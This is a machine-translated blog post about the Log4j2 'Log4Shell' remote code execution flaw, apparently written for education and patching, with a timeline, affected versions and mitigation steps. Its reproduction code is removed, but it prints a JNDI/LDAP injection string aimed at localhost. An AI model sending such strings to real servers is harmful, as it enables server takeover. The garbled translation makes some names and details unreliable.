какПосмотрите еще раз, сила безгранична. Привет, мир :) Поиск WeChat "Программист Аранг".
эта статьяGitHub.com/Ниу Мух/Java…исайт с непрочитанным кодомБыл включен, есть много точек знаний и серии статей.
Обновление 2021-12-18: Выпущена версия 2.17, пожалуйста, обновитесь до последней версии.
До декабря 2021 года утром 10-го в Интернете был выставлен файл log4j.уровень ядерной бомбылазейка, лазейкаСверхвысокий риск, простота в эксплуатации, удобство использования, широкий спектр применения, вы можете напрямуювыполнение произвольного кода,захватить ваш сервер.
Думайте об разоблачителях здесьРаннее утреннее воздействиеПричина, может быть, в том, чтобы разоблачить ранним утром, думая о бесчисленных инженерах, встающих посреди ночи, чтобы сделать срочный ремонт, так что ТА появился на свет.извращенное удовольствие.
Я знаю, что вы хотите увидеть, просто хочу посмотреть, как продемонстрировать, но давайте сначала посмотрим, как это исправить и повысить вашу осведомленность о безопасности.
0x01 Ситуация уязвимости
Apache Log4j2 — отличная среда ведения журналов Java. Благодаря функции рекурсивного анализа некоторых функций Apache Log4j2 злоумышленники могут напрямую создавать вредоносные запросы для запуска уязвимостей удаленного выполнения кода. Для эксплойтов не требуется специальной настройки.
Опубликуйте уровень раскрытия уязвимости здесь.
| Сведения об уязвимости | Уязвимый PoC | Опыт уязвимости | Пустыня |
|---|---|---|---|
| публичный | публичный | публичный | существует |
Благодаря общедоступной онлайн-информации подробности этой уязвимости были полностью раскрыты,Вот простая демонстрация, позволяющая всем понять ситуацию с уязвимостью и как можно скорее выполнить безопасное обновление.
Согласно общедоступным новостям в Интернете, можно выделить следующие временные рамки:
-
24 ноября 2021 года группа безопасности Alibaba Cloud официально сообщила об уязвимости Apache Log4j2 для удаленного выполнения кода в Apache.
-
6 декабря 2021 г. компания log4j2 выпустила пакет восстановления log4j-2.15.0-rc1.jar.
-
10 декабря 2021 г. компания log4j2 выпустила пакет восстановления log4j-2.15.0-rc2.jar.
-
10 декабря 2021 года команда безопасности Alibaba Cloud обнаружилаВерсия Apache Log4j 2.15.0-rc1 имеет обход уязвимости,Пожалуйста, своевременно обновите Apache Log4j до версии 2.15.0-rc2..
Фактический пострадавший диапазон выглядит следующим образом:
Apache Log4j 2.x < 2.15.0-rc2
0x02 Совет по безопасности
-
Проверьте, внедрил ли приложение пакет Apache log4j-core Jar.Если введена зависимость, и она находится в рамках затронутой версии, это может повлиять на уязвимость. Пожалуйста, как можно скорее обновите все приложения, связанные с Apache Log4j2, допоследний log4j-2.15.0-rc2 версия, адресGitHub.com/Apache/Хихик…
-
Обновите известные уязвимые приложения и компоненты, такие как spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink.
-
Временные варианты смягчения. Версию jdk можно обновить до 6u211/7u201/8u191/11.0.1 или выше, что может в определенной степени ограничить использование таких уязвимостей, как JNDI. Для версий Log4j выше 2.10 вы можете установить для log4j2.formatMsgNoLookups значение True или удалить класс JndiLookup из пути к классам, например zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/ поиск/JndiLookup .класс
0x03 Повторное появление уязвимости
Следующие тесты используются только для обучения и анализа, а не для других целей! Автономная демонстрация, все адреса127.0.0.1.
Картинки рисовать не планировал, но многие студенты думали, что закачка уязвимостей — это просто запуск онлайн${jndi:ldap://127.0.0.1:1389/Log4jTest}, думаю надо еще картинку нарисовать, чтобы вкратце пояснить, простенькая пошаговая диаграмма цепочки атаки, извините за поспешность.
3.1. Моделирование среды — построение службы помощи жертвам
Я удалил его здесь, после того, как выложил его, мне нехорошо, и он может быть использован людьми с другими мыслями, поэтому я его удалил. Хотите знать прямую программу поиска WeChat обезьяны Alang для общения,
3.2. Ambient Ink — имитация злоумышленника
Я удалил его здесь, после того, как выложил его, мне нехорошо, и он может быть использован людьми с другими мыслями, поэтому я его удалил. Хотите знать прямую программу поиска WeChat обезьяны Alang для общения,
3.3 Тестирование
Служба жертвы Xiaobai снова запускается.Первоначально была просто напечатана только одна строка логов, но теперь появилась дополнительная строка информации описания.
无害测试,没有攻击性,linux/mac 创建文本:xxxyyyzzz.txt;windows 弹出计算器。最后求关注,公众号:程序猿阿朗
20:21:57.780 [main] ERROR Log4j2 - params:${jndi:ldap://127.0.0.1:1389/Log4jTest}
Запустите каталог проекта с еще одним файлом одновременноxxxyyyzzz.txt
Если вы запускаете тест в Windows, появится калькулятор.
Как всегда, код в статье находится по адресу:GitHub.com/Bull Magic О/рог-…
Привет мир : ) Я Аланг, передовой технический инструмент.Я серьезно пишу статьи и прошу лайк.
Статья постоянно обновляется, можете обратить внимание на номер паблика»Программист Аранг” или посетитьБлог о непрочитанном коде (https://www.wdbyte.com)".
эта статьяGitHub.com/Ниу Мух/Java…Он был включен, есть много знаний и серии статей, добро пожаловать в Star.